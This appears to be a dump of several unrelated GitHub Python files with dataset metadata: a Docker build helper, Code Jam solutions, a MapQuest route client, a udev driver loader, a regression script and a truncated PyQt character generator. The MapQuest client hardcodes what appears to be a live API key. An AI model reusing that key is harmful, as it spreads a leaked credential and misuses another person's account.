p_docker_sudo_bool)\n\n#-------------------------------------------------------------\n# GET_IMAGE_FULL_NAMES\ndef get_image_full_names(p_image_name_str,\n\tp_app_build_meta_map,\n\tp_user_name_str,\n\tp_git_commit_hash_str = None):\n\tassert isinstance(p_image_name_str, str)\n\tassert isinstance(p_app_build_meta_map, dict)\n\tassert isinstance(p_user_name_str, str)\n\n\t# IMAGE_TAG\n\timage_tag_str = None\n\tif not p_git_commit_hash_str == None:\n\t\t# if a git commit hash was supplied, tag the image with that\n\t\timage_tag_str = p_git_commit_hash_str\n\telse:\n\t\tservice_version_str = p_app_build_meta_map[\"version_str\"]\n\t\t# assert len(service_version_str.split(\".\")) == 4 # format x.x.x.x\n\t\timage_tag_str = service_version_str\n\n\timage_full_names_lst = []\n\n\t# standard name\n\timage_full_name_str = \"%s/%s:%s\"%(p_user_name_str, p_image_name_str, image_tag_str)\n\timage_full_names_lst.append(image_full_name_str)\n\n\t# IMPORTANT!! - \"latest\" name - its important to always havea a \"latest\" image that points\n\t# to the most up-to-date container image for use in situations when we dont know\n\t# the version number or git commit hash or some other tag.\n\tif not image_tag_str == \"latest\":\n\t\timage_full_name_latest_str = \"%s/%s:latest\"%(p_user_name_str, p_image_name_str)\n\t\timage_full_names_lst.append(image_full_name_latest_str)\n\n\treturn image_full_names_lst\n\n#-------------------------------------------------------------\ndef copy_files(p_copy_to_dir_lst):\n\tassert isinstance(p_copy_to_dir_lst, list)\n\n\tprint(\"\")\n\tprint(\" COPY FILES\")\n\tfor src_f_str, target_dir_str in p_copy_to_dir_lst:\n\t\tif not os.path.isdir(target_dir_str):\n\t\t\tgf_core_cli.run(\"mkdir -p %s\"%(target_dir_str))\n\t\tgf_core_cli.run(\"cp %s %s\"%(src_f_str, target_dir_str))\n\n#-------------------------------------------------------------\n# PREPARE_WEB_FILES\ndef prepare_web_files(p_pages_map,\n\tp_service_base_dir_str,\n\tp_log_fun,\n\tp_docker_sudo_bool = False):\n\tp_log_fun(\"FUN_ENTER\", \"gf_containers.prepare_web_files()\")\n\tassert isinstance(p_pages_map, dict)\n\tassert os.path.dirname(p_service_base_dir_str)\n\n\tfor pg_name_str, pg_info_map in p_pages_map.items():\n\t\tprint(f\"======== {fg('green')}{'%s'%(pg_name_str)}{attr(0)}\")\n\t\tassert isinstance(pg_info_map, dict)\n\t\tassert \"build_dir_str\" in pg_info_map.keys()\n\t\tassert os.path.isdir(pg_info_map[\"build_dir_str\"])\n\n\t\tbuild_dir_str = os.path.abspath(pg_info_map[\"build_dir_str\"])\n\n\t\t#------------------\n\t\t# CREATE_TARGET_DIR\n\t\ttarget_dir_str = os.path.abspath(f\"{p_service_base_dir_str}/static\")\n\t\tgf_core_cli.run(f\"mkdir -p {target_dir_str}\")\n\n\t\t#------------------\n\t\t# COPY_PAGE_WEB_CODE\n\t\tgf_core_cli.run(f\"cp -r {build_dir_str}/* {target_dir_str}\")\n\n\t\t#------------------\n\t\t\n\t#------------------\n\t# MOVE_TEMPLATES_OUT_OF_STATIC\n\n\t# IMPORTANT!! - templates should not be in the static/ dir, which would make them servable\n\t# over HTTP which we dont want. instead its moved out of the static/ dir \n\t# to its parent dir where its private.\n\t# templates are originally in the static/ dir because durring the build process they were\n\t# handled together with other static content (html/css/js files) and as output moved\n\t# into that static/ dir from other locations while in development.\n\tgf_core_cli.run(\"rm -rf %s/../templates\"%(target_dir_str)) # remove existing templates build dir\n\tgf_core_cli.run(\"mv %s/templates %s/..\"%(target_dir_str, target_dir_str))\n\t\n\t#------------------\n\n#-------------------------------------------------------------\ndef get_service_dockerfile(p_app_build_meta_map):\n\tservice_base_dir_str = p_app_build_meta_map[\"service_base_dir_str\"]\n\tassert os.path.isdir(service_base_dir_str)\n\n\tif \"service_dockerfile_path_str\" in p_app_build_meta_map.keys():\n\t\tservice_dockerfile_path_str = p_app_build_meta_map[\"service_dockerfile_path_str\"]\n\telse:\n\t\tservice_dockerfile_path_str = \"%s/Dockerfile\"%(service_base_dir_str)\n\n\treturn service_dockerfile_path_str","repo_name":"gloflow/gloflow","sub_path":"py/gf_ops/containers/gf_containers.py","file_name":"gf_containers.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"23555823241","text":"t = int(input())\n\nfor i in range(1, t+1):\n n = input()\n\n\n tidy = False\n while not tidy:\n num = [] \n for item in range(len(n)):\n num.append(int(n[item]))\n\n change = False \n for j in range(len(num)-1):\n if num[j]>num[j+1]:\n num[j] -= 1\n bad = j+1\n change = True\n break\n\n if change:\n for k in range(bad, len(num)):\n num[k] = 9\n\n if num[0] == 0:\n num.pop(0)\n\n tidy = True\n for j in range(len(num)-1):\n if num[j]>num[j+1]:\n tidy = False\n\n n = ''\n for k in range(len(num)):\n n += str(num[k])\n\n print(\"Case #{}: {}\".format(i, n))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/2511.py","file_name":"2511.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27017990438","text":"import urllib.request\nimport urllib.parse\nimport json\n\nBASE_MAPQUEST_DESTINATION_URL = 'http://open.mapquestapi.com/directions/v2/route'\nBASE_MAPQUEST_ELEVATION_URL = 'http://open.mapquestapi.com/elevation/v1/profile'\nMAPQUEST_API_KEY = 'hIZ98AIBoOx3ZiEH2562DAwJYyuiMCXA'\n\ndef build_destination_url(places: [str]) -> str:\n '''\n Creates the URL for the route. If there are multiple destinations,\n adds the extra destinations to the end.\n '''\n parameters = [\n ('key', MAPQUEST_API_KEY), ('from', places[0])\n ]\n del places[0]\n for index in range(len(places)):\n parameters.append(('to', places[index]))\n return BASE_MAPQUEST_DESTINATION_URL+'?'+urllib.parse.urlencode(parameters)\n\ndef build_elevation_url(lat_long: [str]) -> str:\n '''\n Creates the URL for the elevation. Attaches all the latitudes\n and longitudes of the destinations.\n '''\n parameters = [\n ('key', MAPQUEST_API_KEY), ('shapeFormat', 'raw')\n ]\n url = BASE_MAPQUEST_ELEVATION_URL+'?'+urllib.parse.urlencode(parameters)+'&latLngCollection='\n counter = 0\n for latlong in lat_long:\n if counter != len(lat_long)-1:\n url = url + latlong + ','\n counter += 1\n else:\n url = url + latlong\n\n #turns the units to feet\n url = url + '&unit=f'\n return url\n\ndef get_result(url: str) -> 'json text':\n '''\n Returns the result from reading the URL\n '''\n response = None\n try:\n response = urllib.request.urlopen(url)\n return json.load(response)\n finally:\n if response!= None:\n response.close()\n","repo_name":"andrewttsui/MapQuest-GPS","sub_path":"project3_api.py","file_name":"project3_api.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44462075407","text":"from inaugurator import pyudev\nfrom inaugurator import sh\nimport logging\nimport os\nimport fnmatch\n\n\n_ALSO = {\n 'mlx4_core': ['mlx4_en']\n}\n\n\ndef loadAllDrivers():\n context = pyudev.Context()\n aliasTable = _loadAliasTable()\n deviceList = list(context.list_devices())\n for device in deviceList:\n if u'MODALIAS' not in device:\n continue\n try:\n for k, v in device.iteritems():\n logging.info(\"\\t%s: %s\" % (k.encode('utf-8'), v.encode('utf-8')))\n except Exception as e:\n logging.info(str(e))\n logging.warning(\"WARNING: Failed to logging.info(driver details, will not load it. Skipping.\")\n continue\n driver = _findDriver(device, aliasTable)\n if driver is None:\n logging.info(\"No driver, skipping\")\n else:\n _loadDriver(driver)\n\n\ndef _loadDriver(driver):\n \"This is for upwards dependency, not modprobe like dependency\"\n logging.info(\"Driver: %s, modprobing\" % driver)\n sh.run(\"busybox modprobe %s\" % driver)\n if driver in _ALSO:\n logging.info(\"Additional drivers must be loaded for '%s': %s\" % (driver, _ALSO[driver]))\n for also in _ALSO[driver]:\n _loadDriver(also)\n\n\ndef _kernelVersion():\n return sh.run(\"busybox uname -r\").strip()\n\n\ndef _loadAliasTable():\n path = os.path.join(\"/lib/modules/%s/modules.alias\" % _kernelVersion())\n table = dict()\n with open(path) as f:\n for line in f.readlines():\n if line.startswith(\"#\"):\n continue\n alias, driver = line.strip().split(\" \")[1:]\n if ':' not in alias:\n continue\n subsystem = alias.split(\":\")[0]\n if subsystem not in table:\n table[subsystem] = dict()\n logging.info(alias)\n table[subsystem][alias] = driver\n return table\n\n\ndef _lookLike(alias, pattern):\n parts = pattern.split(\"*\")\n for part in parts:\n if part not in alias:\n return False\n return True\n\n\ndef _findDriver(device, aliasTable):\n alias = device[u'MODALIAS']\n subsystem = alias.split(\":\")[0]\n for pattern in aliasTable.get(subsystem, dict()):\n if _lookLike(alias, pattern):\n if fnmatch.fnmatch(alias, pattern):\n return aliasTable[subsystem][pattern]\n return None\n\n\nif __name__ == \"__main__\":\n global _kernelVersion\n ver = _kernelVersion()\n\n def _kernelVersion():\n return ver\n\n def fakeSH(command):\n logging.info(\"COMMAND - %s\", command)\n sh.run = fakeSH\n loadAllDrivers()\n","repo_name":"Stratoscale/inaugurator","sub_path":"inaugurator/udev.py","file_name":"udev.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72860738114","text":"#/usr/bin/env python\nimport os\nfrom setuptools import setup, find_packages\n\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\n\n# Dynamically calculate the version based on photologue.VERSION\nversion_tuple = __import__('photologue').VERSION\nif len(version_tuple) == 3:\n version = \"%d.%d.%s\" % version_tuple\nelse:\n version = \"%d.%d\" % version_tuple[:2]\n\nsetup(\n name = \"django-photologue-praekelt\",\n version = version,\n description = \"Powerful image management for the Django web framework. Praekelt fork.\",\n author = \"Justin Driscoll\",\n author_email = \"hedley@praekelt.com\",\n url = \"https://github.com/praekelt/django-photologue/\",\n packages = find_packages(),\n package_data = {\n 'photologue': [\n 'res/*.jpg',\n 'locale/*/LC_MESSAGES/*',\n 'templates/photologue/*.html',\n 'templates/photologue/tags/*.html',\n ]\n },\n zip_safe = False,\n test_suite=\"setuptest.setuptest.SetupTestSuite\",\n tests_require=[\n 'django-setuptest>=0.1.4',\n 'Pillow',\n ],\n classifiers = ['Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities'],\n)\n","repo_name":"praekelt/django-photologue","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"61"} +{"seq_id":"23446724911","text":"T = int(input())\r\nfor I in range(1, T+1):\r\n n, x = [int(x) for x in input().split()]\r\n sizes = [int(x) for x in input().split()]\r\n sizes.sort()\r\n # find the biggest for smallest:\r\n good = 0\r\n for i in range(0, n):\r\n if (sizes[0] + sizes[i] <= x):\r\n good = i\r\n if (good == 0):\r\n result = n\r\n else:\r\n skipped = n - good - 1\r\n found = 0\r\n begin = 0\r\n end = good\r\n while (begin < end):\r\n if (sizes[begin] + sizes[end] <= x):\r\n begin += 1\r\n end -= 1\r\n found += 1\r\n else:\r\n end -= 1\r\n skipped += 1\r\n if begin == end:\r\n skipped += 1\r\n result = skipped + found\r\n \r\n \r\n print(\"Case #%d: %s\" % (I, result))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_148/217.py","file_name":"217.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7605866242","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 19 21:32:25 2021\n\n@author: Dietrich\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error\n\n#%% Problem 1\n\n# Read in data\ntrain = pd.read_csv('C:/Users/Dietrich/Documents/GitHub/Deep-Learning-Labs/Lab 5/Scripts/data.csv')\n\n# Handle missing values\ndata = train.select_dtypes(include=[np.number]).interpolate().dropna()\n\n# Delete rows where GarageArea == 0, meaning there was either no garage\n# or GarageArea was not properly recorded.\ndata = data[data.GarageArea != 0]\n\n##Build a linear model\ny = np.log(data.SalePrice)\nX = data.drop(['SalePrice', 'Id'], axis=1)\n\n\n# Plot Sale Price vs Garage Area to check for outliers\nplt.scatter(data.GarageArea,y)\nplt.xlabel('Garage Area')\nplt.ylabel('Sale Price')\nplt.title('Sale Price vs Garage Area')\n\n#%% Problem 2 and 3\n\n# Read in data\ntrain = pd.read_csv('C:/Users/Dietrich/Documents/GitHub/Deep-Learning-Labs/Lab 5/Scripts/data2.csv')\n# Initialize Plot\nplt.style.use(style = 'ggplot')\nplt.rcParams['figure.figsize'] = (10,6)\n\n#Convert Categorical data to numerical\ntrain['City Group'] = train['City Group'].map( {'Big Cities': 1, 'Other': 0} ).astype(int)\ntrain['Type'] = train['Type'].map( {'FC': 0, 'IL': 1, 'DT': 2, 'MB':3} ).astype(int)\n\n# Get stats for revenue column and check skew\nprint(train.revenue.describe())\nprint(train.revenue.skew())\n#plt.hist(train.revenue)\nplt.show()\ny = np.log(train.revenue)\nprint('skew is', y.skew())\nplt.hist(y)\n\n\n#%%\n# Check correlation\nnumeric_features = train.select_dtypes(include=[np.number])\ncorr = numeric_features.corr()\ntop_corr = corr['revenue'].sort_values(ascending=False)[:6]\nprint(corr['revenue'].sort_values(ascending=False)[:6],'\\n')\nprint(corr['revenue'].sort_values(ascending=False)[-5:])\n\n\n\n\n#%% Model Creation\n\n# Initialize X and Y data\ny = np.log(train.revenue)\n#X = train.drop(['revenue', 'Id'], axis=1)\nX = train[top_corr.index.drop('revenue')]\n\n# Split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42, test_size=.33)\n# Perform Linear Regression\nlr = linear_model.LinearRegression()\n# Fit model to training data\nmodel = lr.fit(X_train, y_train)\n# Evaluate the performance and visualize results\nprint (\"R^2 is: \\n\", model.score(X_test, y_test))\npredictions = model.predict(X_test)\nprint ('RMSE is: \\n', mean_squared_error(y_test, predictions))\n\n#%%\n##visualize\n\nactual_values = y_test\nplt.scatter(predictions, actual_values, alpha=.75, color='b') #alpha helps to show overlapping data\n\nplt.xlabel('Predicted Price')\nplt.ylabel('Actual Price')\nplt.title('Linear Regression Model')\nplt.show()\n","repo_name":"dxkruse/Deep-Learning-Labs","sub_path":"Lab 5/Scripts/ICP5.py","file_name":"ICP5.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29579712407","text":"from setuptools import setup, find_packages\n\n\nPACKAGENAME = \"thechopper\"\nVERSION = \"0.1\"\n\n\nsetup(\n name=PACKAGENAME,\n version=VERSION,\n setup_requires=[\"pytest-runner\"],\n author=\"Andrew Hearin\",\n author_email=\"ahearin@anl.gov\",\n description=\"Python tools to subdivide cosmological simulations and tabulate synthetic observables\",\n long_description=\"Python tools to subdivide cosmological simulations and tabulate synthetic observables\",\n install_requires=[\"numpy\"],\n packages=find_packages(),\n url=\"https://github.com/ArgonneCPAC/thechopper\",\n)\n","repo_name":"ArgonneCPAC/thechopper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74179581634","text":"from itertools import permutations\nfrom typing import (Iterable,\n Dict)\n\nfrom utils import (prime_numbers,\n digits_to_number,\n number_to_digits)\n\n\ndef sub_string_divisible_numbers(*,\n digits: Iterable[int],\n slicers_by_divisors: Dict[int, slice]\n ) -> Iterable[int]:\n for digits in permutations(digits):\n number = digits_to_number(digits)\n digits = list(number_to_digits(number))\n for divisor, slicer in slicers_by_divisors.items():\n digits_slice = digits[slicer]\n sliced_number = digits_to_number(digits_slice)\n if sliced_number % divisor:\n break\n else:\n yield number\n\n\nprimes_generator = prime_numbers(18)\nslicers_by_divisors = {next(primes_generator): slice(start - 1, start + 2)\n for start in range(2, 9)}\n\nassert sum(sub_string_divisible_numbers(\n digits=range(10),\n slicers_by_divisors=slicers_by_divisors)) == 16_695_334_890\n","repo_name":"lycantropos/Project-Euler","sub_path":"43.py","file_name":"43.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23548794271","text":"Cases = int(input())\nfor Case in range(Cases):\n\ts, k = input().split()\n\ts = [1 if c=='-' else 0 for c in s]\n\tk = int(k)\n\tu = 0\n\tfor i in range(len(s)-k+1):\n\t\tif s[i] == 1:\n\t\t\tfor j in range(k):\n\t\t\t\ts[i+j] = 1-s[i+j]\n\t\t\tu += 1\n\tif sum(s) == 0:\n\t\tprint('Case #%d: %d' % (Case+1, u))\n\telse:\n\t\tprint('Case #%d: IMPOSSIBLE' % (Case+1))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/630.py","file_name":"630.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71732798275","text":"import pickle\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nimport pandas as pd\r\nimport cv2\r\nimport os\r\nimport csv\r\nfrom options import Trainandverify\r\n\r\n\r\n\r\n# cv2.imshow('img',img)\r\n# cv2.waitKey(0)\r\nC = './predict'\r\nD = 'D:\\work\\Masterdegree\\shapmatching\\predict'\r\nparser = Trainandverify()\r\nopts = parser.parse()\r\nprint(opts.file_name)\r\npath = C\r\nfile_list = os.listdir(path)\r\nfilter_list = []\r\ntarget = opts.file_name\r\nimg = cv2.imread('../data/style/' + opts.pic+'.png').astype('float')\r\nh,w,_ = img.shape\r\nh = int(h)\r\nw = int(w)\r\nfor f in file_list:\r\n if target in f :\r\n filter_list.append(f)\r\n\r\nfor fi in filter_list: \r\n\r\n # file_target = '0_e_f_6_19042022-1250im-10001ep-rec-100-sadv-4.0'\r\n file_target = fi\r\n arr = os.listdir(os.path.join(path , file_target))\r\n b = dict()\r\n g = dict()\r\n r = dict()\r\n t = dict()\r\n length = len(arr)\r\n i =0\r\n for filename in arr:\r\n img2 = cv2.imread(os.path.join(os.path.join(path , file_target),filename)).astype('float')\r\n nh,nw,_ = img2.shape\r\n img = cv2.resize(img,(nw,nh))\r\n b.update({int(filename.split('_')[0]):np.mean(np.abs(img[:,:,0]-img2[:,:,0])).astype('float')})\r\n g.update({int(filename.split('_')[0]):np.mean(np.abs(img[:,:,1]-img2[:,:,1])).astype('float')})\r\n r.update({int(filename.split('_')[0]):np.mean(np.abs(img[:,:,2]-img2[:,:,2])).astype('float')})\r\n t.update({int(filename.split('_')[0]):np.mean(np.abs(img-img2)).astype('float')})\r\n i += 1\r\n print('Process: %d/%d'%(i,length))\r\n\r\n s_b = dict(sorted(b.items()))\r\n s_g = dict(sorted(g.items()))\r\n s_r = dict(sorted(r.items()))\r\n s_t = dict(sorted(t.items()))\r\n epoch = []\r\n b_err = []\r\n g_err = []\r\n r_err = []\r\n t_err = []\r\n for k,v in s_b.items():\r\n \r\n epoch.append(k)\r\n b_err.append(v)\r\n\r\n for k,v in s_g.items():\r\n g_err.append(v)\r\n\r\n for k,v in s_r.items():\r\n r_err.append(v)\r\n for k,v in s_t.items():\r\n t_err.append(v)\r\n\r\n file = open('./losses/' + file_target +'.csv')\r\n csvreader = csv.reader(file)\r\n rows=[]\r\n for row in csvreader:\r\n \r\n if row[3] != 'Lrec':\r\n rows.append(row[3])\r\n file.close\r\n\r\n save_list = {\r\n 'epoch': epoch,\r\n 'B_err': b_err,\r\n 'G_err': g_err,\r\n 'R_err': r_err,\r\n 'Total_err': t_err,\r\n 'Train_err': rows,\r\n }\r\n\r\n df = pd.DataFrame(save_list)\r\n df.to_csv(r'../src/ver_losses/' + file_target + '.csv',index=False)\r\n# img3 = (img-img2)\r\n\r\n# print(np.mean(img3))\r\n\r\n","repo_name":"thanaphon0737/pytorch-vita-apply-text-replacement","sub_path":"verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9995374469","text":"\r\n\r\nfrom PyQt5.QtCore import QDateTime, Qt, QTimer\r\nfrom PyQt5.QtWidgets import (QApplication, QCheckBox, QComboBox, QDateTimeEdit,\r\n QDial, QDialog, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLineEdit,\r\n QProgressBar, QPushButton, QRadioButton, QScrollBar, QSizePolicy,\r\n QSlider, QSpinBox, QStyleFactory, QTableWidget, QTabWidget, QTextEdit,\r\n QVBoxLayout, QWidget)\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtCore import *\r\nfrom tkinter import * \r\nfrom tkinter import Tk\r\nfrom tkinter import filedialog\r\nimport json\r\nimport os\r\nimport math\r\nimport numpy as np\r\n\r\ndef get_json(path):\r\n with open(path, \"r\") as json_file:\r\n data = json.load(json_file)\r\n return data\r\n \r\ninfo = get_json(\"./info.json\")\r\ncharTemplate = get_json(\"./character-sheet.json\")\r\n \r\nclass mainWindow(QDialog):\r\n def __init__(self, parent=None):\r\n super(mainWindow, self).__init__(parent)\r\n \r\n self.setFixedSize(600,400)\r\n mainLayout= QHBoxLayout()\r\n # mainLayout.setStretch(400,400)\r\n \r\n menuWidget = QWidget()\r\n \r\n menuLayout = QVBoxLayout()\r\n menuWidget.setLayout(menuLayout)\r\n menuLayout.addStretch()\r\n \r\n newCharButton = QPushButton(\"Create New\")\r\n newCharButton.clicked.connect(self.createNew)\r\n menuLayout.addWidget(newCharButton)\r\n \r\n loadCharButton = QPushButton(\"Load\")\r\n self.charWindow = characterWindow()\r\n loadCharButton.clicked.connect(self.load)\r\n menuLayout.addWidget(loadCharButton)\r\n \r\n exitButton = QPushButton(\"Quit\")\r\n exitButton.clicked.connect(self.exitProgram)\r\n menuLayout.addWidget(exitButton)\r\n menuLayout.addStretch()\r\n \r\n self.backgroundImage = QLabel()\r\n pixmap = QPixmap(\"./bin/background_image.jpg\")\r\n self.backgroundImage.setPixmap(pixmap)\r\n self.setStyleSheet(\"QDialog{background-image: url(bin/background_image.jpg)}\")\r\n \r\n mainLayout.addStretch()\r\n mainLayout.addWidget(menuWidget)\r\n mainLayout.addStretch()\r\n self.setLayout(mainLayout)\r\n self.setWindowTitle(\"Abril Theia Character Generator\")\r\n \r\n \r\n def createNew(self):\r\n self.nameDialog = enterNameWindow()\r\n \r\n def load(self):\r\n self.charWindow.onOpen()\r\n # self.charWindow.show()\r\n \r\n def exitProgram(self):\r\n self.close()\r\n \r\n \r\nclass singleLineEdit(QTextEdit):\r\n def keyPressEvent(self,event):\r\n if event.key() in (Qt.Key_Return,Qt.Key_Enter):\r\n return\r\n super().keyPressEvent(event)\r\n \r\nclass enterNameWindow(QDialog):\r\n def __init__(self,parent=None):\r\n super(enterNameWindow, self).__init__(parent)\r\n \r\n self.setWindowTitle(\"Enter file name\")\r\n nameLayout = QVBoxLayout()\r\n self.setnametext = QLabel()\r\n self.setnametext.setText(\"Enter your character name here \\n(This can be changed later)\")\r\n self.setLayout(nameLayout)\r\n self.nameEntryBox = QLineEdit(\"\")\r\n nameLayout.addWidget(self.setnametext)\r\n nameLayout.addWidget(self.nameEntryBox)\r\n \r\n okButton = QPushButton(\"OK\")\r\n okButton.clicked.connect(self.onClickOK)\r\n nameLayout.addWidget(okButton)\r\n self.show()\r\n \r\n def onClickOK(self):\r\n name = self.nameEntryBox.text()\r\n if name != \"\":\r\n charTemplate[\"character\"] = name\r\n jsonName = \".\".join([name,\"json\"])\r\n fileRoute = \"\".join([\"./characters/\",jsonName])\r\n # ADD: If character exists - ask if wanting to overwrite \r\n with open(fileRoute, \"w+\") as file:\r\n json.dump(charTemplate,file,indent=4,sort_keys=True)\r\n print(\"File created at: \",jsonName)\r\n else:\r\n pass\r\n self.close()\r\n \r\nclass raceBox(QComboBox):\r\n def __init__(self):\r\n super(raceBox,self).__init__()\r\n for race in info[\"races\"]:\r\n self.addItem(info[\"races\"][race][\"raceName\"])\r\n \r\nclass heritageBox(QComboBox):\r\n def __init__(self):\r\n super(heritageBox,self).__init__()\r\n \r\nclass characterWindow(QDialog):\r\n def __init__(self, parent=None):\r\n super(characterWindow, self).__init__(parent) \r\n self.file = None\r\n self.fileName = None\r\n self.changed_list=[]\r\n self.imagePath = \"\"\r\n self.starting = True\r\n GridLayout = QGridLayout()\r\n \r\n #### TABS\r\n \r\n self.tabs = QTabWidget()\r\n self.chartab = QWidget()\r\n chartabLayout = QGridLayout()\r\n \r\n self.skilltab = QWidget()\r\n skilltabLayout = QGridLayout()\r\n \r\n self.combattab = QWidget()\r\n combattabLayout = QGridLayout()\r\n \r\n self.traitstab = QWidget()\r\n traitstabLayout = QGridLayout()\r\n \r\n self.invtab = QWidget()\r\n invtabLayout = QGridLayout()\r\n \r\n self.tabs.addTab(self.chartab,\"Character\")\r\n self.tabs.addTab(self.skilltab, \"Skills\")\r\n self.tabs.addTab(self.combattab, \"Combat\")\r\n self.tabs.addTab(self.traitstab, \"Traits\")\r\n self.tabs.addTab(self.invtab, \"Inventory\")\r\n \r\n #### CHARACTER TAB WIDGETS\r\n \r\n nameLayout = QHBoxLayout()\r\n nameContainer = QWidget()\r\n nameContainer.setLayout(nameLayout)\r\n \r\n self.nameText = QLabel(\"Name:\")\r\n self.nameBox = singleLineEdit()\r\n self.nameBox.setFixedHeight(25)\r\n self.nameBox.setText(\"Name\")\r\n nameLayout.addWidget(self.nameText)\r\n nameLayout.addWidget(self.nameBox)\r\n # nameLayout.addStretch()\r\n \r\n attrsContainer = QWidget()\r\n attrsLayout = QGridLayout()\r\n attrsContainer.setLayout(attrsLayout)\r\n \r\n self.attrsLabels = []\r\n self.attrsMinLabels = []\r\n self.attrsMaxLabels = []\r\n self.attrsManual = []\r\n self.attrsTraits = []\r\n self.attrsTotals = []\r\n self.attrsBonus = []\r\n \r\n attrs = [\"Strength\",\"Dexterity\",\"Constitution\",\"Intelligence\",\"Wisdom\",\"Charisma\"]\r\n for index,attr in enumerate(attrs):\r\n self.attrsLabels.append(QLabel(attr))\r\n attrsLayout.addWidget(self.attrsLabels[index],index+1,0,1,1)\r\n self.attrsMinLabels.append(QLabel())\r\n attrsLayout.addWidget(self.attrsMinLabels[index],index+1,1,1,1)\r\n self.attrsMaxLabels.append(QLabel())\r\n attrsLayout.addWidget(self.attrsMaxLabels[index],index+1,2,1,1)\r\n self.attrsManual.append(QSpinBox())\r\n self.attrsManual[index].setFixedSize(40,25)\r\n self.attrsManual[index].valueChanged.connect(lambda: self.update_file(show_update=False))\r\n attrsLayout.addWidget(self.attrsManual[index],index+1,3,1,1)\r\n self.attrsTraits.append(QLabel(\"0\"))\r\n attrsLayout.addWidget(self.attrsTraits[index],index+1,4,1,1)\r\n self.attrsTotals.append(QLabel(\"0\"))\r\n attrsLayout.addWidget(self.attrsTotals[index],index+1,5,1,1)\r\n self.attrsBonus.append(QLabel())\r\n attrsLayout.addWidget(self.attrsBonus[index],index+1,6,1,1)\r\n # self.attrsOthers.append(QLabel())\r\n # attrsLayout.addWidget(self.attrsOthers[index],index+1,4,1,1)\r\n \r\n attrsLayout.addWidget(QLabel(\"Stat\"),0,0,1,1)\r\n attrsLayout.addWidget(QLabel(\"Min\"),0,1,1,1)\r\n attrsLayout.addWidget(QLabel(\"Max\"),0,2,1,1)\r\n attrsLayout.addWidget(QLabel(\"Traits\"),0,4,1,1)\r\n attrsLayout.addWidget(QLabel(\"Total\"),0,5,1,1)\r\n attrsLayout.addWidget(QLabel(\"Bonus\"),0,6,1,1)\r\n \r\n self.ptsSpent = QLabel(\"Points Spent: \")\r\n self.ptsSpent.setAlignment(Qt.AlignCenter)\r\n attrsLayout.addWidget(self.ptsSpent,7,0,1,6)\r\n \r\n \r\n raceLayout = QHBoxLayout()\r\n raceContainer = QWidget()\r\n raceContainer.setLayout(raceLayout)\r\n self.raceText = QLabel(\"Race:\")\r\n self.raceListBox = raceBox()\r\n self.raceListBox.activated.connect(lambda: self.update_file(show_update=False))\r\n self.raceInfoButton = QPushButton(\"Info\")\r\n self.raceInfoButton.setFixedWidth(50)\r\n self.raceInfoButton.clicked.connect(self.genRaceInfoWindow)\r\n raceLayout.addWidget(self.raceText)\r\n raceLayout.addWidget(self.raceListBox)\r\n raceLayout.addWidget(self.raceInfoButton)\r\n \r\n heritageLayout = QHBoxLayout()\r\n heritageContainer = QWidget()\r\n heritageContainer.setLayout(heritageLayout)\r\n self.heritageText = QLabel(\"Heritage:\")\r\n self.heritageListBox = heritageBox()\r\n self.heritageListBox.activated.connect(lambda: self.update_file(show_update=False))\r\n self.heritageInfoButton = QPushButton(\"Info\")\r\n self.heritageInfoButton.setFixedWidth(50)\r\n self.heritageInfoButton.clicked.connect(self.genHeritageInfoWindow)\r\n heritageLayout.addWidget(self.heritageText)\r\n heritageLayout.addWidget(self.heritageListBox)\r\n heritageLayout.addWidget(self.heritageInfoButton)\r\n \r\n imageLayout = QVBoxLayout()\r\n imageContainer = QWidget()\r\n imageContainer.setLayout(imageLayout)\r\n self.charImage = QLabel()\r\n imageContainer.setFixedHeight(300)\r\n 